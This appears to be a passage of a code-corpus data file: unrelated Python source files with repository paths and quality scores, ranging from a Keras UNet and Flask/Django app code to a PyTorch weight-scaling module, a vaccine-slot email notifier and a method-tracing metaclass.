u = merge((a2, u), mode='concat', concat_axis=3)
u = Dropout(drop)(u)
u = Convolution2D(n_filters, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
u = Convolution2D(n_filters, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
u = Conv2DTranspose(n_filters, (3, 3), strides=(2, 2), padding="same")(u)
u = merge((a1, u), mode='concat', concat_axis=3)
u = Dropout(drop)(u)
u = Convolution2D(n_filters, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
u = Convolution2D(n_filters, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
# Final output
final_activation = 'sigmoid'
u = Convolution2D(1, 1, 1, activation=final_activation, init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
u = Reshape((dim, dim))(u)
if k2:
model = Model(inputs=img_input, outputs=u)
else:
model = Model(input=img_input, output=u)
optimizer = Adam(lr=learn_rate)
model.compile(loss='binary_crossentropy',metrics=['binary_accuracy'], optimizer=optimizer)
print(model.summary())
return model
#<NAME>'s UNet deeper
def unet_deeper(dim, learn_rate, lmbda, drop, FL, init, n_filters):
print('Making UNET model...')
img_input = Input(batch_shape=(None, dim, dim, 1))
a1 = Convolution2D(n_filters, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(img_input)
a1 = Convolution2D(n_filters, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(a1)
a1P = MaxPooling2D((2, 2), strides=(2, 2))(a1)
a2 = Convolution2D(n_filters * 2, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(a1P)
a2 = Convolution2D(n_filters * 2, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(a2)
a2P = MaxPooling2D((2, 2), strides=(2, 2))(a2)
a3 = Convolution2D(n_filters * 4, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(a2P)
a3 = Convolution2D(n_filters * 4, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(a3)
a3P = MaxPooling2D((2, 2), strides=(2, 2), )(a3)
a4 = Convolution2D(n_filters * 8, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(a3P)
a4 = Convolution2D(n_filters * 8, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(a4)
a4P = MaxPooling2D((2, 2), strides=(2, 2), )(a4)
u = Convolution2D(n_filters * 8, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(a4P)
u = Convolution2D(n_filters * 8, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
u = UpSampling2D((2, 2))(u)
u = merge((a4, u), mode='concat', concat_axis=3)
u = Dropout(drop)(u)
u = Convolution2D(n_filters * 4, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
u = Convolution2D(n_filters * 4, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
u = UpSampling2D((2, 2))(u)
u = merge((a3, u), mode='concat', concat_axis=3)
u = Dropout(drop)(u)
u = Convolution2D(n_filters * 2, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
u = Convolution2D(n_filters * 2, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
u = UpSampling2D((2, 2))(u)
u = merge((a2, u), mode='concat', concat_axis=3)
u = Dropout(drop)(u)
u = Convolution2D(n_filters, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
u = Convolution2D(n_filters, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
u = UpSampling2D((2, 2))(u)
u = merge((a1, u), mode='concat', concat_axis=3)
u = Dropout(drop)(u)
u = Convolution2D(n_filters, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
u = Convolution2D(n_filters, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
# Final output
final_activation = 'sigmoid'
u = Convolution2D(1, 1, 1, activation=final_activation, init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
u = Reshape((dim, dim))(u)
if k2:
model = Model(inputs=img_input, outputs=u)
else:
model = Model(input=img_input, output=u)
optimizer = Adam(lr=learn_rate)
model.compile(loss='binary_crossentropy',metrics=['binary_accuracy'], optimizer=optimizer)
print(model.summary())
return model
if __name__ == '__main__':
#simple_resunet_upsample(256,112)#21,368,705
unet_deeper(256,0.0001,1e-6,0.15,3,'he_normal',112)
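    # Optional smoke-test sketch (illustrative only; assumes Keras 2 with a
    # TensorFlow backend): fit the shallow UNET on random data to check shapes.
    model = unet(64, 0.0001, 1e-6, 0.15, 3, 'he_normal', 16)
    X = np.random.rand(4, 64, 64, 1)
    y = (np.random.rand(4, 64, 64) > 0.5).astype('float32')
    model.fit(X, y, batch_size=2, epochs=1)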
| 2.53125
| 3
|
CSD_API/REFCODEs_to_CIFs.py
|
andrewtarzia/cage_collect
| 0
|
12782940
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
# Distributed under the terms of the MIT License.
"""
Script to convert list of REFCODEs into CIFs.
No constraints are applied.
Author: <NAME>
Date Created: 12 May 2019
"""
import ccdc.io
import sys
import CSD_f
def main():
if (not len(sys.argv) == 4):
print """
Usage: REFCODEs_to_CIFs.py REFCODE_file missing_struct
REFCODE_file (str) -
file with list of REFCODEs
missing_struct (str) -
file with list of REFCODEs with missing structs
cross_references (str) -
file with list of REFCODEs that require cross_references
"""
sys.exit()
else:
RCODE_file = sys.argv[1]
missing_struct = sys.argv[2]
cross_references = sys.argv[3]
# read in CSD and updates
entry_reader = CSD_f.get_entryreader()
REFCODEs = []
for line in open(RCODE_file, 'r'):
REFCODEs.append(line.rstrip())
RC_nostruct = []
RC_CR = []
for i, RC in enumerate(sorted(REFCODEs)):
entry = entry_reader.entry(RC)
crystal = None
if entry.has_3d_structure:
crystal = entry.crystal
elif entry.has_3d_structure is False:
# test if CSD REFCODE is of type XXXXXX01
# which implies that XXXXXX will have coordinates and
# this is a child entry
# only assuming this can be the case a new REFCODE is in
if len(entry.cross_references) == 0:
# print 'struct missing: '+str(RC)+' '
# +str(entry.ccdc_number)
RC_nostruct.append(RC)
continue
else:
for CR in entry.cross_references:
# check if cross ref type is coordinates
if CR.type == 'Coordinates ref':
idents = CR.identifiers
for ID in idents:
try:
new_entry = entry_reader.entry(ID)
except RuntimeError:
# implies this new entry ID is not in
# the CSD
RC_nostruct.append(RC)
continue
if new_entry.has_3d_structure:
crystal = new_entry.crystal
RC_CR.append((RC, ID))
break
# write to CIF - saves as REFCODE in input file even if cross
# reference is used
if crystal is not None:
ccdc.io.CrystalWriter(RC+'_extracted.cif').write(crystal)
print '-------------------------------------------------'
print 'structures missing: '+str(len(RC_nostruct))+' of '+str(len(REFCODEs))
with open(missing_struct, 'w') as f:
for RC in RC_nostruct:
f.write(RC+'\n')
print '-------------------------------------------------'
print 'cross refs used: '+str(len(RC_CR))+' of '+str(len(REFCODEs))
with open(cross_references, 'w') as f:
for RC, CR in RC_CR:
f.write(RC+','+CR+'\n')
if __name__ == "__main__":
main()
| 2.90625
| 3
|
bookworm/search/templatetags/results.py
|
srilatha44/threepress
| 2
|
12782941
|
<gh_stars>1-10
import logging
from lxml import etree
from lxml.html import soupparser
from django import template
log = logging.getLogger('library.templatetags')
register = template.Library()
@register.inclusion_tag('includes/result.html', takes_context=True)
def display_result(context, htmlfile, search_term):
'''Render a result with the matching context.'''
context = result_fragment(htmlfile.processed_content, search_term)
return {'result': htmlfile,
'context':context }
def result_fragment(content, search_term):
'''Primitive result context handler'''
try:
parsed_content = soupparser.fromstring(content)
for p in parsed_content.iter(tag='p'):
words = [w for w in ' '.join((w.lower() for w in p.xpath('text()'))).split(' ')]
if search_term.lower() in words:
return etree.tostring(p)
except Exception, e:
log.error(e)
| 2.65625
| 3
|
app/models/message.py
|
Info-ag/labplaner
| 7
|
12782942
|
from datetime import datetime
from app.models import db
__all__ = ['Message']
class Message(db.Model):
"""Message
Messages only have an author. They are either connected to a working
group (AG) or to an individual user (recepient).
:param id:
:param message:
:param time:
:param author_id:
:param ag_id:
:param recepient_id:
Relationships:
- users_messages: status of a message (recepient only)
"""
__tablename__ = 'messages'
id = db.Column(db.Integer, primary_key=True, unique=True, nullable=False)
message = db.Column(db.Text(1000), nullable=False)
    time = db.Column(db.DateTime, default=datetime.now)  # pass the callable so each row gets its own timestamp
author_id = db.Column(db.Integer, db.ForeignKey('users.id'), nullable=True)
ag_id = db.Column(db.Integer, db.ForeignKey('ags.id'), nullable=True)
recepient_id = db.Column(db.Integer, db.ForeignKey('users.id'), nullable=True)
author = db.relationship(
'User',
back_populates='messages',
primaryjoin='User.id == Message.author_id',)
recepient = db.relationship(
'User',
back_populates='messages',
primaryjoin='User.id == Message.recepient_id',)
ag = db.relationship('AG', back_populates='messages')
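# Minimal usage sketch (illustrative; assumes an application context and two
# existing users with ids 1 and 2 -- both hypothetical):
#
#   msg = Message(message='Hello!', author_id=1, recepient_id=2)
#   db.session.add(msg)
#   db.session.commit()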
| 2.921875
| 3
|
webapp/__init__.py
|
Copyrighted/portfolio
| 0
|
12782943
|
<filename>webapp/__init__.py
from flask import Flask
from flask_mail import Mail
from flaskext.markdown import Markdown
from webapp.config import Config
from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager
from flask_bootstrap import Bootstrap
from flask_wtf.csrf import CSRFProtect
from flask_migrate import Migrate
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker, scoped_session
app = Flask(__name__)
app.config.from_object(Config)  # load configuration before initialising extensions
bootstrap = Bootstrap(app)
csrf = CSRFProtect(app)  # passing the app here already calls init_app()
db = SQLAlchemy(app)
migrate = Migrate(app, db, compare_type=True)
login = LoginManager(app)
login.session_protection = 'strong'
login.login_view = 'login'
engine = create_engine(Config.SQLALCHEMY_DATABASE_URI)
Session = sessionmaker()
Session.configure(bind=engine)
session = scoped_session(Session)
Markdown(app)
app.static_folder = 'static'
from webapp import routes, models
| 2.28125
| 2
|
utils/ply_utils.py
|
WeberSamuel/MonoRecPL
| 0
|
12782944
|
<filename>utils/ply_utils.py
from array import array
import torch
from monorec.model.layers import Backprojection
class PLYSaver(torch.nn.Module):
def __init__(self, height, width, min_d=3, max_d=400, batch_size=1, roi=None, dropout=0):
super(PLYSaver, self).__init__()
self.min_d = min_d
self.max_d = max_d
self.roi = roi
self.dropout = dropout
self.data = array('f')
self.projector = Backprojection(batch_size, height, width)
def save(self, file):
length = len(self.data) // 6
header = "ply\n" \
"format binary_little_endian 1.0\n" \
f"element vertex {length}\n" \
f"property float x\n" \
f"property float y\n" \
f"property float z\n" \
f"property float red\n" \
f"property float green\n" \
f"property float blue\n" \
f"end_header\n"
file.write(header.encode(encoding="ascii"))
self.data.tofile(file)
def add_depthmap(self, depth: torch.Tensor, image: torch.Tensor, intrinsics: torch.Tensor,
extrinsics: torch.Tensor):
        depth = 1 / depth  # input is assumed to be inverse depth; convert to depth
        image = (image + .5) * 255  # de-normalise colours to the 0..255 range
mask = (self.min_d <= depth) & (depth <= self.max_d)
if self.roi is not None:
mask[:, :, :self.roi[0], :] = False
mask[:, :, self.roi[1]:, :] = False
            # slice up to roi[2]; the original indexed only a single column
            mask[:, :, :, :self.roi[2]] = False
mask[:, :, :, self.roi[3]:] = False
if self.dropout > 0:
mask = mask & (torch.rand_like(depth) > self.dropout)
coords = self.projector(depth, torch.inverse(intrinsics))
coords = extrinsics @ coords
coords = coords[:, :3, :]
data_batch = torch.cat([coords, image.view_as(coords)], dim=1).permute(0, 2, 1)
data_batch = data_batch[mask.view(depth.shape[0], 1, -1).permute(0, 2, 1).expand(-1, -1, 6)]
self.data.extend(data_batch.cpu().tolist())
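# Minimal usage sketch (illustrative; tensor shapes and camera matrices are
# made up, and the depth argument is the network's inverse-depth output):
#
#   saver = PLYSaver(height=256, width=512, batch_size=1)
#   saver.add_depthmap(inv_depth, image, intrinsics, extrinsics)
#   with open('cloud.ply', 'wb') as f:
#       saver.save(f)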
| 2.4375
| 2
|
code_week9_622_628/pattern_matching_lcci.py
|
dylanlee101/leetcode
| 0
|
12782945
|
<reponame>dylanlee101/leetcode
'''
You are given two strings, pattern and value. The pattern string consists of the letters "a" and "b" and describes a pattern to look for in a string. For example, the string "catcatgocatgo" matches the pattern "aabab" (where "cat" is "a" and "go" is "b"); it also matches patterns such as "a", "ab" and "b". Note, however, that "a" and "b" may not both map to the same string. Write a method that determines whether the value string matches the pattern string.
Example 1:
Input: pattern = "abba", value = "dogcatcatdog"
Output: true
Example 2:
Input: pattern = "abba", value = "dogcatcatfish"
Output: false
Example 3:
Input: pattern = "aaaa", value = "dogcatcatdog"
Output: false
Example 4:
Input: pattern = "abba", value = "dogdogdogdog"
Output: true
Explanation: "a" = "dogdog", "b" = ""; the reverse mapping also satisfies the rule.
Constraints:
0 <= len(pattern) <= 1000
0 <= len(value) <= 1000
You may assume pattern contains only the letters "a" and "b", and that value contains only lowercase letters.
Source: LeetCode (力扣)
Link: https://leetcode-cn.com/problems/pattern-matching-lcci
'''
class Solution:
def patternMatching(self, pattern: str, value: str) -> bool:
count_a = sum(1 for ch in pattern if ch == 'a')
count_b = len(pattern) - count_a
if count_a < count_b:
count_a, count_b = count_b, count_a
pattern = ''.join('a' if ch == 'b' else 'b' for ch in pattern)
if not value:
return count_b == 0
if not pattern:
return False
        # enumerate every feasible length for the substring mapped to 'a';
        # the length for 'b' is then fixed by the remaining characters
        for len_a in range(len(value) // count_a + 1):
rest = len(value) - count_a * len_a
if (count_b == 0 and rest == 0) or (count_b != 0 and rest % count_b == 0):
len_b = 0 if count_b == 0 else rest // count_b
pos, correct = 0, True
value_a, value_b = None, None
for ch in pattern:
if ch == 'a':
sub = value[pos:pos + len_a]
if not value_a:
value_a = sub
elif value_a != sub:
correct = False
break
pos += len_a
else:
sub = value[pos:pos + len_b]
if not value_b:
value_b = sub
elif value_b != sub:
correct = False
break
pos += len_b
if correct and value_a != value_b:
return True
return False
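# Quick check (illustrative): the four examples from the problem statement.
if __name__ == '__main__':
    s = Solution()
    print(s.patternMatching('abba', 'dogcatcatdog'))   # True
    print(s.patternMatching('abba', 'dogcatcatfish'))  # False
    print(s.patternMatching('aaaa', 'dogcatcatdog'))   # False
    print(s.patternMatching('abba', 'dogdogdogdog'))   # True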
| 3.359375
| 3
|
my_project/init_ephys.py
|
ttngu207/u24-example-ephys-pipeline
| 0
|
12782946
|
import datajoint as dj
from djsubject import subject
from djlab import lab
from djephys import ephys
from my_project.utils import get_ephys_probe_data_dir, get_ks_data_dir
# ============== Declare "lab" and "subject" schema ==============
lab.declare('u24_lab')
subject.declare('u24_subject',
dependencies={'Source': lab.Source,
'Lab': lab.Lab,
'Protocol': lab.Protocol,
'User': lab.User})
# ============== Declare Session table ==============
schema = dj.schema('u24_experiment')
@schema
class Session(dj.Manual):
definition = """
-> subject.Subject
session_datetime: datetime
"""
# ============== Declare "ephys" schema ==============
ephys.declare(dj.schema('u24_ephys'),
dependencies={'Subject': subject.Subject,
'Session': Session,
'Location': lab.Location,
'get_npx_data_dir': get_ephys_probe_data_dir,
'get_ks_data_dir': get_ks_data_dir})
# ---- Add neuropixels probes ----
for probe_type in ('neuropixels 1.0 - 3A', 'neuropixels 1.0 - 3B',
'neuropixels 2.0 - SS', 'neuropixels 2.0 - MS'):
ephys.ProbeType.create_neuropixels_probe(probe_type)
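# Minimal usage sketch (illustrative; assumes a configured DataJoint
# connection, and the Subject primary-key attribute name is hypothetical):
#
#   Session.insert1({'subject': 'subject01',
#                    'session_datetime': '2021-01-01 12:00:00'})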
| 2.171875
| 2
|
cowin_appointment_check.py
|
Bharys/India-Covid-Vaccination-Alert
| 1
|
12782947
|
<gh_stars>1-10
import requests
import datetime,pprint,time
import smtplib, ssl
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
curr_date = datetime.date.today().strftime('%d-%m-%Y')
mys_restricted_pin = [
570008,571186,570026,570020,570004,570010,570004,570001,570013,570007,570001,\
570002,570017,570010,570020,570008,570001,570010,570019,570012,570014,570008,570023,570011,\
570001,570004,570001,570024,570004,570023,570019,570004,570001,570006,570021,570016,570004,\
570001,570004,570008,570005,570008,570007,570004,570010,570021,570015,570011,570007,570020,\
570004,570006,570009,570004,570021,570015,570011,570003,570008,570021,570019,570005,570004,\
570002,570008,570017,570008,570020,571130
]
jayanagara_pin = [560011,560069]
district_code = {'mysore':266,'chamarajanagar':271,'bbmp':294}
dist_payload = {'district_id':district_code['mysore'],'date':curr_date} #default payload
subscribers=[
{'age':18,
'district':'mysore',
'to_email':[],#add email
'restricted_pin':mys_restricted_pin,
'restricted_hospital':[],#add hospital center code
'name':'Mysuru City',
'dose':1
},
{'age':18,
'district':'chamarajanagar',
'to_email':[],#add email
'name':'Chamarajanagara District',
'dose':1
},
{'age':45,
'district':'bbmp',
'to_email':[],
'restricted_pin':jayanagara_pin,
'name':'Jayanagara, Bengaluru',
'dose':2
},
{'age':45,
'district':'mysore',
'to_email':[],
'name':'Mysore City',
'restricted_pin':mys_restricted_pin,
'date':'29-06-2021',
'dose':2
}
]
headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36",
'content-type': 'application/json',
"Accept-Language":'hi-IN'
}
smtpServer = "smtp.gmail.com"
port = 587
from_email = ''#add gmail
pswd = <PASSWORD>
context = ssl.create_default_context()
pp = pprint.PrettyPrinter(indent=4)
dist_url = 'https://cdn-api.co-vin.in/api/v2/appointment/sessions/public/calendarByDistrict'
master_data={}
booking_website = 'https://selfregistration.cowin.gov.in/'
table_style = """
<style>
table,th,tr,td{
border:0.1px solid black
}
table{
border-collapse:collapse
}
</style>
"""
def get_from_date(s_idx):
group = subscribers[s_idx]
ret_date = curr_date
    if 'date' in group and time.strptime(group['date'], '%d-%m-%Y') > time.strptime(curr_date, '%d-%m-%Y'):
        ret_date = group['date']
return ret_date
def send_email(email_content,place_name,to_email=[],age=18,dose=1):
    server = None  # so the finally clause is safe even if SMTP setup fails
    try:
if(len(to_email)>0):
intro = 'Vaccine for age <strong>{}+, Dose{}</strong> in <strong>{}</strong> available at {} pincode(s) as on {} {}'.format(age,dose,place_name,len(email_content),curr_time,curr_date)
msg = MIMEMultipart('alternative')
msg['Subject'] = "Vaccine {}+ Dose{}, {}".format(age,dose,place_name)
msg['From'] = ''#add email
table_contents = ''
sorted_keys = sorted(email_content)
for key in sorted_keys:
center_list = email_content[key]
if(len(center_list)>0):
for center in center_list:
col_name = '<td>'+str(center['name'])+'</td>'
col_pin = '<td>'+str(center['pin_code'])+'</td>'
col_slot = ''
for info in center['date_slots']:
col_slot += str(info)+'<br>'
col_slot = '<td>'+col_slot+'</td>'
col_cost = '<td>'+center['cost']+'</td>'
row = '<tr>{}{}{}{}</tr>'.format(col_name,col_pin,col_slot,col_cost)
table_contents += row
html = """ <html>
<head>{}</head>
<body>
<p>{}</p>
<table>
<tr><th>Name</th><th>Pin</th><th>Date(no. of slots)</th><th>Fee</th></tr>
{}
</table>
<p><a href={}>Register</a></p>
</body>
</html>
""".format(table_style,intro,table_contents,booking_website)
table_info = MIMEText(html, 'html')
server = smtplib.SMTP(smtpServer,port)
server.starttls(context=context)
server.ehlo()
msg.attach(table_info)
server.ehlo()
server.login(from_email, pswd)
server.sendmail(from_email,to_email,msg.as_string())
except Exception as e:
print("the email could not be sent.",e)
    finally:
        if server is not None:
            server.close()
def apply_filter(s_idx,c_idx):
group = subscribers[s_idx]
district_id = district_code[group['district']]
date = get_from_date(s_idx)
clinic_data = master_data[(district_id,date)][c_idx]
pin_check = False
hospital_check = False
    if 'restricted_pin' not in group or clinic_data['pincode'] in group['restricted_pin']:
        pin_check = True
    if 'restricted_hospital' not in group or clinic_data['center_id'] in group['restricted_hospital']:
        hospital_check = True
return pin_check and hospital_check
def get_slot_capacity(subscriber_idx,clinic_day_data):
group = subscribers[subscriber_idx]
dose_num = group['dose']
age = int(group['age'])
slot_capacity = int(clinic_day_data['available_capacity']) if clinic_day_data['min_age_limit'] == age else 0
    if slot_capacity > 0:
        # test each key explicitly: ('a' or 'b') evaluates to 'a', so the
        # original expression only ever checked for the dose-1 key
        if 'available_capacity_dose1' in clinic_day_data or 'available_capacity_dose2' in clinic_day_data:
            slot_capacity = int(clinic_day_data.get('available_capacity_dose' + str(dose_num), 0))
return slot_capacity
def get_centers(subscriber_idx):
group = subscribers[subscriber_idx]
temp = {}
dist_payload['district_id'] = district_code[group['district']]
dist_payload['date'] = get_from_date(subscriber_idx)
master_data_key = (dist_payload['district_id'],dist_payload['date'])
if(master_data_key not in master_data):
result = requests.get(dist_url,params=dist_payload,headers=headers)
print('res:',result.status_code)
if(result.status_code==200):
master_data[master_data_key] = result.json()['centers']
else:
return temp
try:
clinics_data = master_data[master_data_key]
for clinic_idx,clinics in enumerate(clinics_data):
if(apply_filter(subscriber_idx,clinic_idx)):
clinic = {}
clinic['name']=clinics['name']
clinic['pin_code']=clinics['pincode']
clinic['date_slots']=[]
clinic['cost'] = str(clinics['fee_type'])
for sessions in clinics['sessions']:
num_slots = get_slot_capacity(subscriber_idx,sessions)
if(num_slots > 0):
clinic['date_slots'].append(sessions['date']+'('+str(num_slots)+')')
                if clinics['pincode'] not in temp:
                    temp[clinics['pincode']] = []
if(len(clinic['date_slots'])>0):
if('vaccine_fees' in clinics):
for vaccine_type in clinics['vaccine_fees']:
clinic['cost']+="<br>"+str(vaccine_type['vaccine'])+'-'+str(vaccine_type['fee'])
temp[clinics['pincode']].append(clinic)
except Exception as e:
print("Error ",e)
finally:
return temp
for s_idx, group in enumerate(subscribers):
district_name = group['district']
dist_payload['district_id'] = district_code[district_name]
dist_res = []
curr_time = datetime.datetime.now().strftime('%H:%M:%S')
if('dose' in group and group['dose']>0 and group['dose']<3):
dist_res = get_centers(s_idx)
place_name = group['name'] if 'name' in group else district_name.capitalize()
print('Last status fetched for '+place_name+' for age '+str(group['age'])+', Dose'+str(group['dose'])+' at '+str(curr_time)+' '+str(curr_date)+', no. of centers:',len(dist_res))
        if len(dist_res) > 0:
            send_email(dist_res, place_name, group['to_email'], group['age'], group['dose'])
    else:
        print('Dose info not available/incorrect')
| 2.03125
| 2
|
daedalus_data_dictionary/storage/urls.py
|
aristotle-mdr/daedalus-data-dictionary
| 0
|
12782948
|
from django.conf.urls import url
from django.utils.translation import ugettext_lazy as _
from aristotle_mdr.contrib.generic.views import GenericAlterOneToManyView, generic_foreign_key_factory_view
from daedalus_data_dictionary.storage import models
urlpatterns = [
url(r'^dictionary/(?P<iid>\d+)?/edit/?$',
GenericAlterOneToManyView.as_view(
model_base=models.DataDictionary,
model_to_add=models.DataDictionaryInclusion,
model_base_field='datadictionaryinclusion_set',
model_to_add_field='dictionary',
#ordering_field='order',
form_add_another_text=_('Add a metadata concept'),
form_title=_('Change dictionary concept entries')
), name='data_dictionary_edit'),
]
| 1.804688
| 2
|
eeggan/pytorch/modules/weights/weight_scaling.py
|
kahartma/eeggan
| 3
|
12782949
|
# coding=utf-8
# Author: <NAME> <<EMAIL>>
import numpy as np
from torch import nn
from torch.nn import Parameter
from eeggan.pytorch.modules.conv.multiconv import MultiConv1d
class WeightScale(object):
"""
Implemented for PyTorch using WeightNorm implementation
https://pytorch.org/docs/stable/_modules/torch/nn/utils/weight_norm.html
References
----------
<NAME>., <NAME>., <NAME>., & <NAME>. (2017).
Progressive Growing of GANs for Improved Quality, Stability,
and Variation. Retrieved from http://arxiv.org/abs/1710.10196
"""
def __init__(self, name):
self.name = name
def compute_weight(self, module):
w = getattr(module, self.name + '_unscaled')
c = getattr(module, self.name + '_c')
tmp = c * w
return tmp
@staticmethod
def apply(module, name, gain):
fn = WeightScale(name)
weight = getattr(module, name)
# remove w from parameter list
del module._parameters[name]
# Constant from He et al. 2015
c = gain / np.sqrt(np.prod(list(weight.size())[1:]))
setattr(module, name + '_c', float(c))
module.register_parameter(name + '_unscaled', nn.Parameter(weight.data))
setattr(module, name, fn.compute_weight(module))
# recompute weight before every forward()
module.register_forward_pre_hook(fn)
return fn
def remove(self, module):
weight = self.compute_weight(module)
delattr(module, self.name)
        del module._parameters[self.name + '_unscaled']
        # the scale constant was stored as a plain attribute via setattr(),
        # not as a Parameter, so it must be removed with delattr()
        delattr(module, self.name + '_c')
module.register_parameter(self.name, Parameter(weight.data))
def __call__(self, module, inputs, **kwargs):
setattr(module, self.name, self.compute_weight(module))
def weight_scale(module, gain=np.sqrt(2), name='weight'):
"""
Applies equalized learning rate to weights
Parameters
----------
module : module
Module scaling should be applied to (Conv/Linear)
gain : float
Gain of following activation layer
See torch.nn.init.calculate_gain
"""
if isinstance(module, MultiConv1d):
for i in range(len(module.convs)):
WeightScale.apply(module.convs[i], name, gain)
else:
WeightScale.apply(module, name, gain)
return module
def remove_weight_scale(module, name='weight'):
for k, hook in module._forward_pre_hooks.items():
if isinstance(hook, WeightScale) and hook.name == name:
hook.remove(module)
del module._forward_pre_hooks[k]
return module
raise ValueError("weight_scale of '{}' not found in {}"
.format(name, module))
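# Minimal usage sketch (illustrative): scale a convolution's weights for
# equalized learning rate, run a forward pass, then strip the hook again.
if __name__ == '__main__':
    import torch
    conv = nn.Conv1d(4, 8, kernel_size=3)
    weight_scale(conv)  # default gain sqrt(2), as for ReLU-type activations
    out = conv(torch.randn(1, 4, 16))  # hook recomputes 'weight' pre-forward
    remove_weight_scale(conv)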
| 2.59375
| 3
|
tracer/tracer.py
|
zachbateman/tracer
| 0
|
12782950
|
'''
Module containing Tracer metaclass and associated trace decorator.
'''
from types import FunctionType
from functools import wraps
import traceback
from pprint import pprint
import sys
class Tracer(type):
def __new__(cls, name, bases, cls_dct):
wrapped_cls_dct = {}
for attribute_name, attribute in cls_dct.items():
if attribute_name != '__init__':
wrapped_cls_dct[attribute_name] = trace(attribute) if isinstance(attribute, FunctionType) else attribute
else: # overwrite __init__ method to inject instance-level changes
def injected_init(self, *args, **kwargs):
self._trace = []
self.print_trace = lambda: pprint(self._trace, indent=4, depth=3)
cls_dct['__init__'](self, *args, **kwargs) # call existing __init__ after '_trace' attr is added
wrapped_cls_dct['__init__'] = injected_init
return super().__new__(cls, name, bases, wrapped_cls_dct)
def trace(method):
@wraps(method)
def wrapper(self, *args, **kwargs):
self._trace.append((len(self._trace) + 1, method.__name__, args, kwargs))
try:
return method(self, *args, **kwargs)
        except Exception:
traceback.print_exc()
print('\n\n ----- ERROR! Execution failed with above traceback. -----\nBelow is the Object\'s method call trace.')
print(self)
pprint(self._trace, indent=4, depth=3)
sys.exit()
return wrapper
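# Minimal usage sketch (illustrative): every method call on a Tracer-built
# class is appended to the instance's _trace list.
if __name__ == '__main__':
    class Greeter(metaclass=Tracer):
        def __init__(self, name):
            self.name = name

        def greet(self, punctuation='!'):
            return 'Hello, ' + self.name + punctuation

    g = Greeter('world')
    g.greet()
    g.greet(punctuation='?')
    g.print_trace()  # [(1, 'greet', (), {}), (2, 'greet', (), {'punctuation': '?'})]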
| 2.609375
| 3
|